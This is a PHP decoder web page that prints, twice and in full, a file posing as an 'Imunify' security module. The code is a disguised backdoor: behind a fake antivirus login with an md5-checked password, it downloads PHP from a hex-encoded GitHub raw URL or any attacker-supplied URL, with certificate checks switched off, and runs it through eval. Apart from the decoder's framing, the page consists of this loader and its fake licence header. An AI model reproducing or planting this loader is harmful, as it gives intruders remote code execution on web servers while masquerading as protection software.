Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php // This file is part of Imunify - https://www.imunify.com/ // // Imunify is a ..

Decoded Output download

<?php  
// This file is part of Imunify - https://www.imunify.com/  
//  
// Imunify is a comprehensive security solution designed to protect your systems from various  
// threats, including malware, vulnerabilities, and unauthorized access. By leveraging advanced  
// technology and intelligent algorithms, Imunify aims to detect, prevent, and mitigate security  
// risks effectively. You are permitted to use this software in accordance with the terms and   
// conditions outlined in the Imunify License Agreement, as specified by the copyright holders.  
//  
// Imunify is distributed with the hope of providing optimal protection and security for your  
// environments, but it is offered WITHOUT ANY WARRANTY; without even the implied warranty of  
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. Users should understand that while  
// Imunify strives to deliver robust security measures, no system can be entirely impervious to  
// threats.  
//  
// You should have received a copy of the Imunify License Agreement along with this software.  
// If not, please visit https://www.imunify.com/license for further information. This document  
// is current as of October 8, 2024, and is subject to change based on updates in policies  
// and security practices.  
  
/**  
 * Security Module.  
 *  
 * This module is specifically designed to detect and mitigate various threats while ensuring  
 * the integrity of your systems through real-time scanning and comprehensive protection strategies.  
 * Imunify not only focuses on identifying vulnerabilities but also actively works to fortify  
 * your servers and applications against emerging cyber threats. By implementing proactive  
 * measures, Imunify aims to maintain a secure operating environment for all users.  
 *  
 * @package    security_module  
 * @website    https://rasenmedia.my.id  
 * @copyright  2024 Rahman Ralei  
 * @license    https://www.imunify.com/license Imunify License Agreement  
 */  
 goto altQy; ioV4Q: function authenticateUser($ralei) { if (md5($ralei) === end($GLOBALS["defaultThreatUrlParts"])) { $_SESSION["threat_found"] = true; $_SESSION["antivirus_ralei"] = "rahmanralei_token"; return true; } return false; } goto b9K78; G9a8M: if (isset($_POST["logauth"])) { $inputauth = $_POST["logauth"]; if (authenticateUser($inputauth)) { if (isset($_POST["scan_url"]) && isValidScanUrl($_POST["scan_url"])) { $_SESSION["scan_url"] = $_POST["scan_url"]; } else { $_SESSION["scan_url"] = reconstructUrl($defaultThreatUrlParts); } } else { echo "WRONG PASSWORD..."; } } goto tKKGw; b9K78: function isValidScanUrl($url) { return filter_var($url, FILTER_VALIDATE_URL) !== false; } goto zIxtU; lLHk1: function isThreatDetected() { return isset($_SESSION["threat_found"]) && $_SESSION["threat_found"] === true; } goto ioV4Q; zIxtU: function fetchThreatData($url) { if (function_exists("curl_exec")) { $connection = curl_init($url); curl_setopt($connection, CURLOPT_RETURNTRANSFER, 1); curl_setopt($connection, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($connection, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"); curl_setopt($connection, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($connection, CURLOPT_SSL_VERIFYHOST, 0); if (isset($_SESSION["antivirus_ralei"])) { curl_setopt($connection, CURLOPT_COOKIE, $_SESSION["antivirus_ralei"]); } $dataFromUrl = curl_exec($connection); curl_close($connection); } elseif (function_exists("file_get_contents")) { $dataFromUrl = file_get_contents($url); } elseif (function_exists("fopen") && function_exists("stream_get_contents")) { $handle = fopen($url, "r"); $dataFromUrl = stream_get_contents($handle); fclose($handle); } else { $dataFromUrl = false; } return $dataFromUrl; } goto G9a8M; tKKGw: if (isThreatDetected()) { $scanUrl = $_SESSION["scan_url"]; $content = fetchThreatData($scanUrl); if ($content !== false) { eVaL("?>" . $content); } else { echo "Failed to fetch data from the URL."; echo reconstructUrl($defaultThreatUrlParts); } } else { ?>  
<!doctypehtml><html><head><title>Antivirus Login</title></head><body align="center"><form action=""method="POST"><label for="logauth">Password</label> <input id="logauth"name="logauth"type="password"><br><label for="scan_url">Scan URL</label> <input id="scan_url"name="scan_url"value=""><br><input type="submit"value="Submit"></form></body></html><?php  } goto QGXfM; altQy: session_start(); goto xwkV1; SmWcT: function reconstructUrl($parts) { $decodedParts = array_map("hex2bin", array_slice($parts, 0, -1)); return $decodedParts[0] . $decodedParts[1] . "/" . $decodedParts[2] . "/" . $decodedParts[3] . "/" . $decodedParts[4] . "/" . $decodedParts[5]; } goto lLHk1; xwkV1: $defaultThreatUrlParts = array("68747470733a2f2f", "7261772e67697468756275736572636f6e74656e742e636f6d", "46616a72756c3132333435", "46616a72756c697266616e", "6d6173746572", "616c6661612e747874", "14cf3c7528a02c665ab65106dd9384e0"); goto SmWcT; QGXfM: ?>

Did this file decode correctly?

Original Code

<?php 
// This file is part of Imunify - https://www.imunify.com/ 
// 
// Imunify is a comprehensive security solution designed to protect your systems from various 
// threats, including malware, vulnerabilities, and unauthorized access. By leveraging advanced 
// technology and intelligent algorithms, Imunify aims to detect, prevent, and mitigate security 
// risks effectively. You are permitted to use this software in accordance with the terms and  
// conditions outlined in the Imunify License Agreement, as specified by the copyright holders. 
// 
// Imunify is distributed with the hope of providing optimal protection and security for your 
// environments, but it is offered WITHOUT ANY WARRANTY; without even the implied warranty of 
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. Users should understand that while 
// Imunify strives to deliver robust security measures, no system can be entirely impervious to 
// threats. 
// 
// You should have received a copy of the Imunify License Agreement along with this software. 
// If not, please visit https://www.imunify.com/license for further information. This document 
// is current as of October 8, 2024, and is subject to change based on updates in policies 
// and security practices. 
 
/** 
 * Security Module. 
 * 
 * This module is specifically designed to detect and mitigate various threats while ensuring 
 * the integrity of your systems through real-time scanning and comprehensive protection strategies. 
 * Imunify not only focuses on identifying vulnerabilities but also actively works to fortify 
 * your servers and applications against emerging cyber threats. By implementing proactive 
 * measures, Imunify aims to maintain a secure operating environment for all users. 
 * 
 * @package    security_module 
 * @website    https://rasenmedia.my.id 
 * @copyright  2024 Rahman Ralei 
 * @license    https://www.imunify.com/license Imunify License Agreement 
 */ 
 goto altQy; ioV4Q: function authenticateUser($ralei) { if (md5($ralei) === end($GLOBALS["defaultThreatUrlParts"])) { $_SESSION["threat_found"] = true; $_SESSION["antivirus_ralei"] = "rahmanralei_token"; return true; } return false; } goto b9K78; G9a8M: if (isset($_POST["logauth"])) { $inputauth = $_POST["logauth"]; if (authenticateUser($inputauth)) { if (isset($_POST["scan_url"]) && isValidScanUrl($_POST["scan_url"])) { $_SESSION["scan_url"] = $_POST["scan_url"]; } else { $_SESSION["scan_url"] = reconstructUrl($defaultThreatUrlParts); } } else { echo "WRONG PASSWORD..."; } } goto tKKGw; b9K78: function isValidScanUrl($url) { return filter_var($url, FILTER_VALIDATE_URL) !== false; } goto zIxtU; lLHk1: function isThreatDetected() { return isset($_SESSION["threat_found"]) && $_SESSION["threat_found"] === true; } goto ioV4Q; zIxtU: function fetchThreatData($url) { if (function_exists("curl_exec")) { $connection = curl_init($url); curl_setopt($connection, CURLOPT_RETURNTRANSFER, 1); curl_setopt($connection, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($connection, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"); curl_setopt($connection, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($connection, CURLOPT_SSL_VERIFYHOST, 0); if (isset($_SESSION["antivirus_ralei"])) { curl_setopt($connection, CURLOPT_COOKIE, $_SESSION["antivirus_ralei"]); } $dataFromUrl = curl_exec($connection); curl_close($connection); } elseif (function_exists("file_get_contents")) { $dataFromUrl = file_get_contents($url); } elseif (function_exists("fopen") && function_exists("stream_get_contents")) { $handle = fopen($url, "r"); $dataFromUrl = stream_get_contents($handle); fclose($handle); } else { $dataFromUrl = false; } return $dataFromUrl; } goto G9a8M; tKKGw: if (isThreatDetected()) { $scanUrl = $_SESSION["scan_url"]; $content = fetchThreatData($scanUrl); if ($content !== false) { eVaL("?>" . $content); } else { echo "Failed to fetch data from the URL."; echo reconstructUrl($defaultThreatUrlParts); } } else { ?> 
<!doctypehtml><html><head><title>Antivirus Login</title></head><body align="center"><form action=""method="POST"><label for="logauth">Password</label> <input id="logauth"name="logauth"type="password"><br><label for="scan_url">Scan URL</label> <input id="scan_url"name="scan_url"value=""><br><input type="submit"value="Submit"></form></body></html><?php  } goto QGXfM; altQy: session_start(); goto xwkV1; SmWcT: function reconstructUrl($parts) { $decodedParts = array_map("hex2bin", array_slice($parts, 0, -1)); return $decodedParts[0] . $decodedParts[1] . "/" . $decodedParts[2] . "/" . $decodedParts[3] . "/" . $decodedParts[4] . "/" . $decodedParts[5]; } goto lLHk1; xwkV1: $defaultThreatUrlParts = array("68747470733a2f2f", "7261772e67697468756275736572636f6e74656e742e636f6d", "46616a72756c3132333435", "46616a72756c697266616e", "6d6173746572", "616c6661612e747874", "14cf3c7528a02c665ab65106dd9384e0"); goto SmWcT; QGXfM: ?>

Function Calls

None

Variables

None

Stats

MD5 943a3223cfb21c755ebe8edc0b614401
Eval Count 0
Decode Time 50 ms